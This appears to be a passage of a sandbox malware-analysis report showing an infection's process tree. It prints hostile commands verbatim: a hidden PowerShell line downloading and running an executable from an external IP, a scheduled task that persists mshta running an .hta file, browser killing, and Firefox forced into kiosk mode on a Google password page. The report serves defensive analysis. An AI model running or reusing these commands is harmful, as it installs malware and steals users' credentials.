                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          taskkill /F /IM brave.exe /T
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1980 -prefsLen 27097 -prefMapHandle 1984 -prefMapSize 270279 -ipcHandle 2056 -initialChannelId {e1b6eb29-ec32-40aa-bb4f-a511c1c8ffa1} -parentPid 2276 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2276" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2460 -prefsLen 27133 -prefMapHandle 2464 -prefMapSize 270279 -ipcHandle 2480 -initialChannelId {b4b9974e-8566-497d-8b49-4f4cdd5757f7} -parentPid 2276 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2276" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3980 -prefsLen 25213 -prefMapHandle 3984 -prefMapSize 270279 -jsInitHandle 3988 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3996 -initialChannelId {6d6d20f9-5fb0-4ee2-9460-e265190c7a9f} -parentPid 2276 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2276" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4180 -prefsLen 27323 -prefMapHandle 4184 -prefMapSize 270279 -ipcHandle 4252 -initialChannelId {f20806fb-0fcd-42bc-8033-9ce9c553afd5} -parentPid 2276 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2276" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4548 -prefsLen 34822 -prefMapHandle 4552 -prefMapSize 270279 -jsInitHandle 4556 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4520 -initialChannelId {b85e9253-1f39-432f-b9cf-00981cfc386e} -parentPid 2276 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2276" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5132 -prefsLen 34903 -prefMapHandle 5136 -prefMapSize 270279 -ipcHandle 5160 -initialChannelId {12fa5c32-ddc5-4c2f-9ab5-7322f28998e7} -parentPid 2276 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2276" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2936 -prefsLen 32952 -prefMapHandle 4552 -prefMapSize 270279 -jsInitHandle 2960 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5116 -initialChannelId {38d97f99-5e8b-4c12-9ddd-a787ac0f325d} -parentPid 2276 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2276" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5288
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5816 -prefsLen 32952 -prefMapHandle 5820 -prefMapSize 270279 -jsInitHandle 5824 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5832 -initialChannelId {a37233b0-9170-44c9-ae49-b24903e7ca1d} -parentPid 2276 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2276" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5324
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5764 -prefsLen 32952 -prefMapHandle 5760 -prefMapSize 270279 -jsInitHandle 5032 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6044 -initialChannelId {8bb1a096-404a-4b77-b1e6-6c813fe9f5dd} -parentPid 2276 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2276" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10126970101\7987c8a238.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10126970101\7987c8a238.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c schtasks /create /tn Zp1namaPImG /tr "mshta C:\Users\Admin\AppData\Local\Temp\niJXUyiQZ.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    schtasks /create /tn Zp1namaPImG /tr "mshta C:\Users\Admin\AppData\Local\Temp\niJXUyiQZ.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  mshta C:\Users\Admin\AppData\Local\Temp\niJXUyiQZ.hta
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CS6MRUJJ02CFJMZNVADPXX4058TB1IQZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Downloads MZ/PE file
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\TempCS6MRUJJ02CFJMZNVADPXX4058TB1IQZ.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\TempCS6MRUJJ02CFJMZNVADPXX4058TB1IQZ.EXE"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10126980101\nPJztnk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10126980101\nPJztnk.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6804
